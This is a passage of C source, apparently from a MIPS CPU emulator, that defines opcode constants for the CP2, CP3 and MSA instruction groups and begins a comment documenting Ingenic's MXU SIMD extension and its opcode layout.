OPC_PANDN = (31 << 21) | (0x02) | OPC_CP2, OPC_PUNPCKLHW = (24 << 21) | (0x03) | OPC_CP2, OPC_PUNPCKHHW = (25 << 21) | (0x03) | OPC_CP2, OPC_PUNPCKLBH = (26 << 21) | (0x03) | OPC_CP2, OPC_PUNPCKHBH = (27 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_0 = (28 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_1 = (29 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_2 = (30 << 21) | (0x03) | OPC_CP2, OPC_PINSRH_3 = (31 << 21) | (0x03) | OPC_CP2, OPC_PAVGH = (24 << 21) | (0x08) | OPC_CP2, OPC_PAVGB = (25 << 21) | (0x08) | OPC_CP2, OPC_PMAXSH = (26 << 21) | (0x08) | OPC_CP2, OPC_PMINSH = (27 << 21) | (0x08) | OPC_CP2, OPC_PMAXUB = (28 << 21) | (0x08) | OPC_CP2, OPC_PMINUB = (29 << 21) | (0x08) | OPC_CP2, OPC_PCMPEQW = (24 << 21) | (0x09) | OPC_CP2, OPC_PCMPGTW = (25 << 21) | (0x09) | OPC_CP2, OPC_PCMPEQH = (26 << 21) | (0x09) | OPC_CP2, OPC_PCMPGTH = (27 << 21) | (0x09) | OPC_CP2, OPC_PCMPEQB = (28 << 21) | (0x09) | OPC_CP2, OPC_PCMPGTB = (29 << 21) | (0x09) | OPC_CP2, OPC_PSLLW = (24 << 21) | (0x0A) | OPC_CP2, OPC_PSLLH = (25 << 21) | (0x0A) | OPC_CP2, OPC_PMULLH = (26 << 21) | (0x0A) | OPC_CP2, OPC_PMULHH = (27 << 21) | (0x0A) | OPC_CP2, OPC_PMULUW = (28 << 21) | (0x0A) | OPC_CP2, OPC_PMULHUH = (29 << 21) | (0x0A) | OPC_CP2, OPC_PSRLW = (24 << 21) | (0x0B) | OPC_CP2, OPC_PSRLH = (25 << 21) | (0x0B) | OPC_CP2, OPC_PSRAW = (26 << 21) | (0x0B) | OPC_CP2, OPC_PSRAH = (27 << 21) | (0x0B) | OPC_CP2, OPC_PUNPCKLWD = (28 << 21) | (0x0B) | OPC_CP2, OPC_PUNPCKHWD = (29 << 21) | (0x0B) | OPC_CP2, OPC_ADDU_CP2 = (24 << 21) | (0x0C) | OPC_CP2, OPC_OR_CP2 = (25 << 21) | (0x0C) | OPC_CP2, OPC_ADD_CP2 = (26 << 21) | (0x0C) | OPC_CP2, OPC_DADD_CP2 = (27 << 21) | (0x0C) | OPC_CP2, OPC_SEQU_CP2 = (28 << 21) | (0x0C) | OPC_CP2, OPC_SEQ_CP2 = (29 << 21) | (0x0C) | OPC_CP2, OPC_SUBU_CP2 = (24 << 21) | (0x0D) | OPC_CP2, OPC_PASUBUB = (25 << 21) | (0x0D) | OPC_CP2, OPC_SUB_CP2 = (26 << 21) | (0x0D) | OPC_CP2, OPC_DSUB_CP2 = (27 << 21) | (0x0D) | OPC_CP2, OPC_SLTU_CP2 = (28 << 21) | (0x0D) | OPC_CP2, OPC_SLT_CP2 = (29 << 21) | (0x0D) | OPC_CP2, OPC_SLL_CP2 = (24 << 21) | (0x0E) | OPC_CP2, OPC_DSLL_CP2 = (25 << 21) | (0x0E) | OPC_CP2, OPC_PEXTRH = (26 << 21) | (0x0E) | OPC_CP2, OPC_PMADDHW = (27 << 21) | (0x0E) | OPC_CP2, OPC_SLEU_CP2 = (28 << 21) | (0x0E) | OPC_CP2, OPC_SLE_CP2 = (29 << 21) | (0x0E) | OPC_CP2, OPC_SRL_CP2 = (24 << 21) | (0x0F) | OPC_CP2, OPC_DSRL_CP2 = (25 << 21) | (0x0F) | OPC_CP2, OPC_SRA_CP2 = (26 << 21) | (0x0F) | OPC_CP2, OPC_DSRA_CP2 = (27 << 21) | (0x0F) | OPC_CP2, OPC_BIADD = (28 << 21) | (0x0F) | OPC_CP2, OPC_PMOVMSKB = (29 << 21) | (0x0F) | OPC_CP2, }; #define MASK_CP3(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { OPC_LWXC1 = 0x00 | OPC_CP3, OPC_LDXC1 = 0x01 | OPC_CP3, OPC_LUXC1 = 0x05 | OPC_CP3, OPC_SWXC1 = 0x08 | OPC_CP3, OPC_SDXC1 = 0x09 | OPC_CP3, OPC_SUXC1 = 0x0D | OPC_CP3, OPC_PREFX = 0x0F | OPC_CP3, OPC_ALNV_PS = 0x1E | OPC_CP3, OPC_MADD_S = 0x20 | OPC_CP3, OPC_MADD_D = 0x21 | OPC_CP3, OPC_MADD_PS = 0x26 | OPC_CP3, OPC_MSUB_S = 0x28 | OPC_CP3, OPC_MSUB_D = 0x29 | OPC_CP3, OPC_MSUB_PS = 0x2E | OPC_CP3, OPC_NMADD_S = 0x30 | OPC_CP3, OPC_NMADD_D = 0x31 | OPC_CP3, OPC_NMADD_PS = 0x36 | OPC_CP3, OPC_NMSUB_S = 0x38 | OPC_CP3, OPC_NMSUB_D = 0x39 | OPC_CP3, OPC_NMSUB_PS = 0x3E | OPC_CP3, }; /* MSA Opcodes */ #define MASK_MSA_MINOR(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { OPC_MSA_I8_00 = 0x00 | OPC_MSA, OPC_MSA_I8_01 = 0x01 | OPC_MSA, OPC_MSA_I8_02 = 0x02 | OPC_MSA, OPC_MSA_I5_06 = 0x06 | OPC_MSA, OPC_MSA_I5_07 = 0x07 | OPC_MSA, OPC_MSA_BIT_09 = 0x09 | OPC_MSA, OPC_MSA_BIT_0A = 0x0A | OPC_MSA, OPC_MSA_3R_0D = 0x0D | OPC_MSA, OPC_MSA_3R_0E = 0x0E | OPC_MSA, OPC_MSA_3R_0F = 0x0F | OPC_MSA, OPC_MSA_3R_10 = 0x10 | OPC_MSA, OPC_MSA_3R_11 = 0x11 | OPC_MSA, OPC_MSA_3R_12 = 0x12 | OPC_MSA, OPC_MSA_3R_13 = 0x13 | OPC_MSA, OPC_MSA_3R_14 = 0x14 | OPC_MSA, OPC_MSA_3R_15 = 0x15 | OPC_MSA, OPC_MSA_ELM = 0x19 | OPC_MSA, OPC_MSA_3RF_1A = 0x1A | OPC_MSA, OPC_MSA_3RF_1B = 0x1B | OPC_MSA, OPC_MSA_3RF_1C = 0x1C | OPC_MSA, OPC_MSA_VEC = 0x1E | OPC_MSA, /* MI10 instruction */ OPC_LD_B = (0x20) | OPC_MSA, OPC_LD_H = (0x21) | OPC_MSA, OPC_LD_W = (0x22) | OPC_MSA, OPC_LD_D = (0x23) | OPC_MSA, OPC_ST_B = (0x24) | OPC_MSA, OPC_ST_H = (0x25) | OPC_MSA, OPC_ST_W = (0x26) | OPC_MSA, OPC_ST_D = (0x27) | OPC_MSA, }; enum { /* I5 instruction df(bits 22..21) = _b, _h, _w, _d */ OPC_ADDVI_df = (0x0 << 23) | OPC_MSA_I5_06, OPC_CEQI_df = (0x0 << 23) | OPC_MSA_I5_07, OPC_SUBVI_df = (0x1 << 23) | OPC_MSA_I5_06, OPC_MAXI_S_df = (0x2 << 23) | OPC_MSA_I5_06, OPC_CLTI_S_df = (0x2 << 23) | OPC_MSA_I5_07, OPC_MAXI_U_df = (0x3 << 23) | OPC_MSA_I5_06, OPC_CLTI_U_df = (0x3 << 23) | OPC_MSA_I5_07, OPC_MINI_S_df = (0x4 << 23) | OPC_MSA_I5_06, OPC_CLEI_S_df = (0x4 << 23) | OPC_MSA_I5_07, OPC_MINI_U_df = (0x5 << 23) | OPC_MSA_I5_06, OPC_CLEI_U_df = (0x5 << 23) | OPC_MSA_I5_07, OPC_LDI_df = (0x6 << 23) | OPC_MSA_I5_07, /* I8 instruction */ OPC_ANDI_B = (0x0 << 24) | OPC_MSA_I8_00, OPC_BMNZI_B = (0x0 << 24) | OPC_MSA_I8_01, OPC_SHF_B = (0x0 << 24) | OPC_MSA_I8_02, OPC_ORI_B = (0x1 << 24) | OPC_MSA_I8_00, OPC_BMZI_B = (0x1 << 24) | OPC_MSA_I8_01, OPC_SHF_H = (0x1 << 24) | OPC_MSA_I8_02, OPC_NORI_B = (0x2 << 24) | OPC_MSA_I8_00, OPC_BSELI_B = (0x2 << 24) | OPC_MSA_I8_01, OPC_SHF_W = (0x2 << 24) | OPC_MSA_I8_02, OPC_XORI_B = (0x3 << 24) | OPC_MSA_I8_00, /* VEC/2R/2RF instruction */ OPC_AND_V = (0x00 << 21) | OPC_MSA_VEC, OPC_OR_V = (0x01 << 21) | OPC_MSA_VEC, OPC_NOR_V = (0x02 << 21) | OPC_MSA_VEC, OPC_XOR_V = (0x03 << 21) | OPC_MSA_VEC, OPC_BMNZ_V = (0x04 << 21) | OPC_MSA_VEC, OPC_BMZ_V = (0x05 << 21) | OPC_MSA_VEC, OPC_BSEL_V = (0x06 << 21) | OPC_MSA_VEC, OPC_MSA_2R = (0x18 << 21) | OPC_MSA_VEC, OPC_MSA_2RF = (0x19 << 21) | OPC_MSA_VEC, /* 2R instruction df(bits 17..16) = _b, _h, _w, _d */ OPC_FILL_df = (0x00 << 18) | OPC_MSA_2R, OPC_PCNT_df = (0x01 << 18) | OPC_MSA_2R, OPC_NLOC_df = (0x02 << 18) | OPC_MSA_2R, OPC_NLZC_df = (0x03 << 18) | OPC_MSA_2R, /* 2RF instruction df(bit 16) = _w, _d */ OPC_FCLASS_df = (0x00 << 17) | OPC_MSA_2RF, OPC_FTRUNC_S_df = (0x01 << 17) | OPC_MSA_2RF, OPC_FTRUNC_U_df = (0x02 << 17) | OPC_MSA_2RF, OPC_FSQRT_df = (0x03 << 17) | OPC_MSA_2RF, OPC_FRSQRT_df = (0x04 << 17) | OPC_MSA_2RF, OPC_FRCP_df = (0x05 << 17) | OPC_MSA_2RF, OPC_FRINT_df = (0x06 << 17) | OPC_MSA_2RF, OPC_FLOG2_df = (0x07 << 17) | OPC_MSA_2RF, OPC_FEXUPL_df = (0x08 << 17) | OPC_MSA_2RF, OPC_FEXUPR_df = (0x09 << 17) | OPC_MSA_2RF, OPC_FFQL_df = (0x0A << 17) | OPC_MSA_2RF, OPC_FFQR_df = (0x0B << 17) | OPC_MSA_2RF, OPC_FTINT_S_df = (0x0C << 17) | OPC_MSA_2RF, OPC_FTINT_U_df = (0x0D << 17) | OPC_MSA_2RF, OPC_FFINT_S_df = (0x0E << 17) | OPC_MSA_2RF, OPC_FFINT_U_df = (0x0F << 17) | OPC_MSA_2RF, /* 3R instruction df(bits 22..21) = _b, _h, _w, d */ OPC_SLL_df = (0x0 << 23) | OPC_MSA_3R_0D, OPC_ADDV_df = (0x0 << 23) | OPC_MSA_3R_0E, OPC_CEQ_df = (0x0 << 23) | OPC_MSA_3R_0F, OPC_ADD_A_df = (0x0 << 23) | OPC_MSA_3R_10, OPC_SUBS_S_df = (0x0 << 23) | OPC_MSA_3R_11, OPC_MULV_df = (0x0 << 23) | OPC_MSA_3R_12, OPC_DOTP_S_df = (0x0 << 23) | OPC_MSA_3R_13, OPC_SLD_df = (0x0 << 23) | OPC_MSA_3R_14, OPC_VSHF_df = (0x0 << 23) | OPC_MSA_3R_15, OPC_SRA_df = (0x1 << 23) | OPC_MSA_3R_0D, OPC_SUBV_df = (0x1 << 23) | OPC_MSA_3R_0E, OPC_ADDS_A_df = (0x1 << 23) | OPC_MSA_3R_10, OPC_SUBS_U_df = (0x1 << 23) | OPC_MSA_3R_11, OPC_MADDV_df = (0x1 << 23) | OPC_MSA_3R_12, OPC_DOTP_U_df = (0x1 << 23) | OPC_MSA_3R_13, OPC_SPLAT_df = (0x1 << 23) | OPC_MSA_3R_14, OPC_SRAR_df = (0x1 << 23) | OPC_MSA_3R_15, OPC_SRL_df = (0x2 << 23) | OPC_MSA_3R_0D, OPC_MAX_S_df = (0x2 << 23) | OPC_MSA_3R_0E, OPC_CLT_S_df = (0x2 << 23) | OPC_MSA_3R_0F, OPC_ADDS_S_df = (0x2 << 23) | OPC_MSA_3R_10, OPC_SUBSUS_U_df = (0x2 << 23) | OPC_MSA_3R_11, OPC_MSUBV_df = (0x2 << 23) | OPC_MSA_3R_12, OPC_DPADD_S_df = (0x2 << 23) | OPC_MSA_3R_13, OPC_PCKEV_df = (0x2 << 23) | OPC_MSA_3R_14, OPC_SRLR_df = (0x2 << 23) | OPC_MSA_3R_15, OPC_BCLR_df = (0x3 << 23) | OPC_MSA_3R_0D, OPC_MAX_U_df = (0x3 << 23) | OPC_MSA_3R_0E, OPC_CLT_U_df = (0x3 << 23) | OPC_MSA_3R_0F, OPC_ADDS_U_df = (0x3 << 23) | OPC_MSA_3R_10, OPC_SUBSUU_S_df = (0x3 << 23) | OPC_MSA_3R_11, OPC_DPADD_U_df = (0x3 << 23) | OPC_MSA_3R_13, OPC_PCKOD_df = (0x3 << 23) | OPC_MSA_3R_14, OPC_BSET_df = (0x4 << 23) | OPC_MSA_3R_0D, OPC_MIN_S_df = (0x4 << 23) | OPC_MSA_3R_0E, OPC_CLE_S_df = (0x4 << 23) | OPC_MSA_3R_0F, OPC_AVE_S_df = (0x4 << 23) | OPC_MSA_3R_10, OPC_ASUB_S_df = (0x4 << 23) | OPC_MSA_3R_11, OPC_DIV_S_df = (0x4 << 23) | OPC_MSA_3R_12, OPC_DPSUB_S_df = (0x4 << 23) | OPC_MSA_3R_13, OPC_ILVL_df = (0x4 << 23) | OPC_MSA_3R_14, OPC_HADD_S_df = (0x4 << 23) | OPC_MSA_3R_15, OPC_BNEG_df = (0x5 << 23) | OPC_MSA_3R_0D, OPC_MIN_U_df = (0x5 << 23) | OPC_MSA_3R_0E, OPC_CLE_U_df = (0x5 << 23) | OPC_MSA_3R_0F, OPC_AVE_U_df = (0x5 << 23) | OPC_MSA_3R_10, OPC_ASUB_U_df = (0x5 << 23) | OPC_MSA_3R_11, OPC_DIV_U_df = (0x5 << 23) | OPC_MSA_3R_12, OPC_DPSUB_U_df = (0x5 << 23) | OPC_MSA_3R_13, OPC_ILVR_df = (0x5 << 23) | OPC_MSA_3R_14, OPC_HADD_U_df = (0x5 << 23) | OPC_MSA_3R_15, OPC_BINSL_df = (0x6 << 23) | OPC_MSA_3R_0D, OPC_MAX_A_df = (0x6 << 23) | OPC_MSA_3R_0E, OPC_AVER_S_df = (0x6 << 23) | OPC_MSA_3R_10, OPC_MOD_S_df = (0x6 << 23) | OPC_MSA_3R_12, OPC_ILVEV_df = (0x6 << 23) | OPC_MSA_3R_14, OPC_HSUB_S_df = (0x6 << 23) | OPC_MSA_3R_15, OPC_BINSR_df = (0x7 << 23) | OPC_MSA_3R_0D, OPC_MIN_A_df = (0x7 << 23) | OPC_MSA_3R_0E, OPC_AVER_U_df = (0x7 << 23) | OPC_MSA_3R_10, OPC_MOD_U_df = (0x7 << 23) | OPC_MSA_3R_12, OPC_ILVOD_df = (0x7 << 23) | OPC_MSA_3R_14, OPC_HSUB_U_df = (0x7 << 23) | OPC_MSA_3R_15, /* ELM instructions df(bits 21..16) = _b, _h, _w, _d */ OPC_SLDI_df = (0x0 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_CTCMSA = (0x0 << 22) | (0x3E << 16) | OPC_MSA_ELM, OPC_SPLATI_df = (0x1 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_CFCMSA = (0x1 << 22) | (0x3E << 16) | OPC_MSA_ELM, OPC_COPY_S_df = (0x2 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_MOVE_V = (0x2 << 22) | (0x3E << 16) | OPC_MSA_ELM, OPC_COPY_U_df = (0x3 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_INSERT_df = (0x4 << 22) | (0x00 << 16) | OPC_MSA_ELM, OPC_INSVE_df = (0x5 << 22) | (0x00 << 16) | OPC_MSA_ELM, /* 3RF instruction _df(bit 21) = _w, _d */ OPC_FCAF_df = (0x0 << 22) | OPC_MSA_3RF_1A, OPC_FADD_df = (0x0 << 22) | OPC_MSA_3RF_1B, OPC_FCUN_df = (0x1 << 22) | OPC_MSA_3RF_1A, OPC_FSUB_df = (0x1 << 22) | OPC_MSA_3RF_1B, OPC_FCOR_df = (0x1 << 22) | OPC_MSA_3RF_1C, OPC_FCEQ_df = (0x2 << 22) | OPC_MSA_3RF_1A, OPC_FMUL_df = (0x2 << 22) | OPC_MSA_3RF_1B, OPC_FCUNE_df = (0x2 << 22) | OPC_MSA_3RF_1C, OPC_FCUEQ_df = (0x3 << 22) | OPC_MSA_3RF_1A, OPC_FDIV_df = (0x3 << 22) | OPC_MSA_3RF_1B, OPC_FCNE_df = (0x3 << 22) | OPC_MSA_3RF_1C, OPC_FCLT_df = (0x4 << 22) | OPC_MSA_3RF_1A, OPC_FMADD_df = (0x4 << 22) | OPC_MSA_3RF_1B, OPC_MUL_Q_df = (0x4 << 22) | OPC_MSA_3RF_1C, OPC_FCULT_df = (0x5 << 22) | OPC_MSA_3RF_1A, OPC_FMSUB_df = (0x5 << 22) | OPC_MSA_3RF_1B, OPC_MADD_Q_df = (0x5 << 22) | OPC_MSA_3RF_1C, OPC_FCLE_df = (0x6 << 22) | OPC_MSA_3RF_1A, OPC_MSUB_Q_df = (0x6 << 22) | OPC_MSA_3RF_1C, OPC_FCULE_df = (0x7 << 22) | OPC_MSA_3RF_1A, OPC_FEXP2_df = (0x7 << 22) | OPC_MSA_3RF_1B, OPC_FSAF_df = (0x8 << 22) | OPC_MSA_3RF_1A, OPC_FEXDO_df = (0x8 << 22) | OPC_MSA_3RF_1B, OPC_FSUN_df = (0x9 << 22) | OPC_MSA_3RF_1A, OPC_FSOR_df = (0x9 << 22) | OPC_MSA_3RF_1C, OPC_FSEQ_df = (0xA << 22) | OPC_MSA_3RF_1A, OPC_FTQ_df = (0xA << 22) | OPC_MSA_3RF_1B, OPC_FSUNE_df = (0xA << 22) | OPC_MSA_3RF_1C, OPC_FSUEQ_df = (0xB << 22) | OPC_MSA_3RF_1A, OPC_FSNE_df = (0xB << 22) | OPC_MSA_3RF_1C, OPC_FSLT_df = (0xC << 22) | OPC_MSA_3RF_1A, OPC_FMIN_df = (0xC << 22) | OPC_MSA_3RF_1B, OPC_MULR_Q_df = (0xC << 22) | OPC_MSA_3RF_1C, OPC_FSULT_df = (0xD << 22) | OPC_MSA_3RF_1A, OPC_FMIN_A_df = (0xD << 22) | OPC_MSA_3RF_1B, OPC_MADDR_Q_df = (0xD << 22) | OPC_MSA_3RF_1C, OPC_FSLE_df = (0xE << 22) | OPC_MSA_3RF_1A, OPC_FMAX_df = (0xE << 22) | OPC_MSA_3RF_1B, OPC_MSUBR_Q_df = (0xE << 22) | OPC_MSA_3RF_1C, OPC_FSULE_df = (0xF << 22) | OPC_MSA_3RF_1A, OPC_FMAX_A_df = (0xF << 22) | OPC_MSA_3RF_1B, /* BIT instruction df(bits 22..16) = _B _H _W _D */ OPC_SLLI_df = (0x0 << 23) | OPC_MSA_BIT_09, OPC_SAT_S_df = (0x0 << 23) | OPC_MSA_BIT_0A, OPC_SRAI_df = (0x1 << 23) | OPC_MSA_BIT_09, OPC_SAT_U_df = (0x1 << 23) | OPC_MSA_BIT_0A, OPC_SRLI_df = (0x2 << 23) | OPC_MSA_BIT_09, OPC_SRARI_df = (0x2 << 23) | OPC_MSA_BIT_0A, OPC_BCLRI_df = (0x3 << 23) | OPC_MSA_BIT_09, OPC_SRLRI_df = (0x3 << 23) | OPC_MSA_BIT_0A, OPC_BSETI_df = (0x4 << 23) | OPC_MSA_BIT_09, OPC_BNEGI_df = (0x5 << 23) | OPC_MSA_BIT_09, OPC_BINSLI_df = (0x6 << 23) | OPC_MSA_BIT_09, OPC_BINSRI_df = (0x7 << 23) | OPC_MSA_BIT_09, }; /* * * AN OVERVIEW OF MXU EXTENSION INSTRUCTION SET * ============================================ * * * MXU (full name: MIPS eXtension/enhanced Unit) is a SIMD extension of MIPS32 * instructions set. It is designed to fit the needs of signal, graphical and * video processing applications. MXU instruction set is used in Xburst family * of microprocessors by Ingenic. * * MXU unit contains 17 registers called X0-X16. X0 is always zero, and X16 is * the control register. * * * The notation used in MXU assembler mnemonics * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * Register operands: * * XRa, XRb, XRc, XRd - MXU registers * Rb, Rc, Rd, Rs, Rt - general purpose MIPS registers * * Non-register operands: * * aptn1 - 1-bit accumulate add/subtract pattern * aptn2 - 2-bit accumulate add/subtract pattern * eptn2 - 2-bit execute add/subtract pattern * optn2 - 2-bit operand pattern * optn3 - 3-bit operand pattern * sft4 - 4-bit shift amount * strd2 - 2-bit stride amount * * Prefixes: * * Level of parallelism: Operand size: * S - single operation at a time 32 - word * D - two operations in parallel 16 - half word * Q - four operations in parallel 8 - byte * * Operations: * * ADD - Add or subtract * ADDC - Add with carry-in * ACC - Accumulate * ASUM - Sum together then accumulate (add or subtract) * ASUMC - Sum together then accumulate (add or subtract) with carry-in * AVG - Average between 2 operands * ABD - Absolute difference * ALN - Align data * AND - Logical bitwise 'and' operation * CPS - Copy sign * EXTR - Extract bits * I2M - Move from GPR register to MXU register * LDD - Load data from memory to XRF * LDI - Load data from memory to XRF (and increase the address base) * LUI - Load unsigned immediate * MUL - Multiply * MULU - Unsigned multiply * MADD - 64-bit operand add 32x32 product * MSUB - 64-bit operand subtract 32x32 product * MAC - Multiply and accumulate (add or subtract) * MAD - Multiply and add or subtract * MAX - Maximum between 2 operands * MIN - Minimum between 2 operands * M2I - Move from MXU register to GPR register * MOVZ - Move if zero * MOVN - Move if non-zero * NOR - Logical bitwise 'nor' operation * OR - Logical bitwise 'or' operation * STD - Store data from XRF to memory * SDI - Store data from XRF to memory (and increase the address base) * SLT - Set of less than comparison * SAD - Sum of absolute differences * SLL - Logical shift left * SLR - Logical shift right * SAR - Arithmetic shift right * SAT - Saturation * SFL - Shuffle * SCOP - Calculate x's scope (-1, means x<0; 0, means x==0; 1, means x>0) * XOR - Logical bitwise 'exclusive or' operation * * Suffixes: * * E - Expand results * F - Fixed point multiplication * L - Low part result * R - Doing rounding * V - Variable instead of immediate * W - Combine above L and V * * * The list of MXU instructions grouped by functionality * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * Load/Store instructions Multiplication instructions * ----------------------- --------------------------- * * S32LDD XRa, Rb, s12 S32MADD XRa, XRd, Rs, Rt * S32STD XRa, Rb, s12 S32MADDU XRa, XRd, Rs, Rt * S32LDDV XRa, Rb, rc, strd2 S32MSUB XRa, XRd, Rs, Rt * S32STDV XRa, Rb, rc, strd2 S32MSUBU XRa, XRd, Rs, Rt * S32LDI XRa, Rb, s12 S32MUL XRa, XRd, Rs, Rt * S32SDI XRa, Rb, s12 S32MULU XRa, XRd, Rs, Rt * S32LDIV XRa, Rb, rc, strd2 D16MUL XRa, XRb, XRc, XRd, optn2 * S32SDIV XRa, Rb, rc, strd2 D16MULE XRa, XRb, XRc, optn2 * S32LDDR XRa, Rb, s12 D16MULF XRa, XRb, XRc, optn2 * S32STDR XRa, Rb, s12 D16MAC XRa, XRb, XRc, XRd, aptn2, optn2 * S32LDDVR XRa, Rb, rc, strd2 D16MACE XRa, XRb, XRc, XRd, aptn2, optn2 * S32STDVR XRa, Rb, rc, strd2 D16MACF XRa, XRb, XRc, XRd, aptn2, optn2 * S32LDIR XRa, Rb, s12 D16MADL XRa, XRb, XRc, XRd, aptn2, optn2 * S32SDIR XRa, Rb, s12 S16MAD XRa, XRb, XRc, XRd, aptn1, optn2 * S32LDIVR XRa, Rb, rc, strd2 Q8MUL XRa, XRb, XRc, XRd * S32SDIVR XRa, Rb, rc, strd2 Q8MULSU XRa, XRb, XRc, XRd * S16LDD XRa, Rb, s10, eptn2 Q8MAC XRa, XRb, XRc, XRd, aptn2 * S16STD XRa, Rb, s10, eptn2 Q8MACSU XRa, XRb, XRc, XRd, aptn2 * S16LDI XRa, Rb, s10, eptn2 Q8MADL XRa, XRb, XRc, XRd, aptn2 * S16SDI XRa, Rb, s10, eptn2 * S8LDD XRa, Rb, s8, eptn3 * S8STD XRa, Rb, s8, eptn3 Addition and subtraction instructions * S8LDI XRa, Rb, s8, eptn3 ------------------------------------- * S8SDI XRa, Rb, s8, eptn3 * LXW Rd, Rs, Rt, strd2 D32ADD XRa, XRb, XRc, XRd, eptn2 * LXH Rd, Rs, Rt, strd2 D32ADDC XRa, XRb, XRc, XRd * LXHU Rd, Rs, Rt, strd2 D32ACC XRa, XRb, XRc, XRd, eptn2 * LXB Rd, Rs, Rt, strd2 D32ACCM XRa, XRb, XRc, XRd, eptn2 * LXBU Rd, Rs, Rt, strd2 D32ASUM XRa, XRb, XRc, XRd, eptn2 * S32CPS XRa, XRb, XRc * Q16ADD XRa, XRb, XRc, XRd, eptn2, optn2 * Comparison instructions Q16ACC XRa, XRb, XRc, XRd, eptn2 * ----------------------- Q16ACCM XRa, XRb, XRc, XRd, eptn2 * D16ASUM XRa, XRb, XRc, XRd, eptn2 * S32MAX XRa, XRb, XRc D16CPS XRa, XRb, * S32MIN XRa, XRb, XRc D16AVG XRa, XRb, XRc * S32SLT XRa, XRb, XRc D16AVGR XRa, XRb, XRc * S32MOVZ XRa, XRb, XRc Q8ADD XRa, XRb, XRc, eptn2 * S32MOVN XRa, XRb, XRc Q8ADDE XRa, XRb, XRc, XRd, eptn2 * D16MAX XRa, XRb, XRc Q8ACCE XRa, XRb, XRc, XRd, eptn2 * D16MIN XRa, XRb, XRc Q8ABD XRa, XRb, XRc * D16SLT XRa, XRb, XRc Q8SAD XRa, XRb, XRc, XRd * D16MOVZ XRa, XRb, XRc Q8AVG XRa, XRb, XRc * D16MOVN XRa, XRb, XRc Q8AVGR XRa, XRb, XRc * Q8MAX XRa, XRb, XRc D8SUM XRa, XRb, XRc, XRd * Q8MIN XRa, XRb, XRc D8SUMC XRa, XRb, XRc, XRd * Q8SLT XRa, XRb, XRc * Q8SLTU XRa, XRb, XRc * Q8MOVZ XRa, XRb, XRc Shift instructions * Q8MOVN XRa, XRb, XRc ------------------ * * D32SLL XRa, XRb, XRc, XRd, sft4 * Bitwise instructions D32SLR XRa, XRb, XRc, XRd, sft4 * -------------------- D32SAR XRa, XRb, XRc, XRd, sft4 * D32SARL XRa, XRb, XRc, sft4 * S32NOR XRa, XRb, XRc D32SLLV XRa, XRb, Rb * S32AND XRa, XRb, XRc D32SLRV XRa, XRb, Rb * S32XOR XRa, XRb, XRc D32SARV XRa, XRb, Rb * S32OR XRa, XRb, XRc D32SARW XRa, XRb, XRc, Rb * Q16SLL XRa, XRb, XRc, XRd, sft4 * Q16SLR XRa, XRb, XRc, XRd, sft4 * Miscellaneous instructions Q16SAR XRa, XRb, XRc, XRd, sft4 * ------------------------- Q16SLLV XRa, XRb, Rb * Q16SLRV XRa, XRb, Rb * S32SFL XRa, XRb, XRc, XRd, optn2 Q16SARV XRa, XRb, Rb * S32ALN XRa, XRb, XRc, Rb * S32ALNI XRa, XRb, XRc, s3 * S32LUI XRa, s8, optn3 Move instructions * S32EXTR XRa, XRb, Rb, bits5 ----------------- * S32EXTRV XRa, XRb, Rs, Rt * Q16SCOP XRa, XRb, XRc, XRd S32M2I XRa, Rb * Q16SAT XRa, XRb, XRc S32I2M XRa, Rb * * * The opcode organization of MXU instructions * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * The bits 31..26 of all MXU instructions are equal to 0x1C (also referred * as opcode SPECIAL2 in the base MIPS ISA). The organization and meaning of * other bits up to the instruction level is as follows: * * bits * 05..00 * * |- 000000 - OPC_MXU_S32MADD * |- 000001 - OPC_MXU_S32MADDU * |- 000010 - <not assigned> (non-MXU OPC_MUL) * | * | 20..18 * |- 000011 - OPC_MXU__POOL00 --- 000 - OPC_MXU_S32MAX * | |- 001 - OPC_MXU_S32MIN * | |- 010 - OPC_MXU_D16MAX * | |- 011 - OPC_MXU_D16MIN * | |- 100 - OPC_MXU_Q8MAX * | |- 101 - OPC_MXU_Q8MIN * | |- 110 - OPC_MXU_Q8SLT * | |- 111 - OPC_MXU_Q8SLTU * |- 000100 - OPC_MXU_S32MSUB * |- 000101 - OPC_MXU_S32MSUBU 20..18 * |- 000110 - OPC_MXU__POOL01 --- 000 - OPC_MXU_S32SLT * | |- 001 - OPC_MXU_D16SLT * | |- 010 - OPC_MXU_D16AVG * | |- 011 - OPC_MXU_D16AVGR * | |- 100 - OPC_MXU_Q8AVG * | |- 101 - OPC_MXU_Q8AVGR * | |- 111 - OPC_MXU_Q8ADD * | * | 20..18 * |- 000111 - OPC_MXU__POOL02 --- 000 - OPC_MXU_S32CPS * | |- 010 - OPC_MXU_D16CPS * | |- 100 - OPC_MXU_Q8ABD * | |- 110 - OPC_MXU_Q16SAT * |- 001000 - OPC_MXU_D16MUL * | 25..24 * |- 001001 - OPC_MXU__POOL03 --- 00 - OPC_MXU_D16MULF * | |- 01 - OPC_MXU_D16MULE * |- 001010 - OPC_MXU_D16MAC * |- 001011 - OPC_MXU_D16MACF * |- 001100 - OPC_MXU_D16MADL * |- 001101 - OPC_MXU_S16MAD * |- 001110 - OPC_MXU_Q16ADD * |- 001111 - OPC_MXU_D16MACE 23 * | |- 0 - OPC_MXU_S32LDD * |- 010000 - OPC_MXU__POOL04 --- 1 - OPC_MXU_S32LDDR * | * | 23 * |- 010001 - OPC_MXU__POOL05 --- 0 - OPC_MXU_S32STD * | |- 1 - OPC_MXU_S32STDR * | * | 13..10 * |- 010010 - OPC_MXU__POOL06 --- 0000 - OPC_MXU_S32LDDV * | |- 0001 - OPC_MXU_S32LDDVR * | * | 13..10 * |- 010011 - OPC_MXU__POOL07 --- 0000 - OPC_MXU_S32STDV * | |- 0001 - OPC_MXU_S32STDVR * | * | 23 * |- 010100 - OPC_MXU__POOL08 --- 0 - OPC_MXU_S32LDI * | |- 1 - 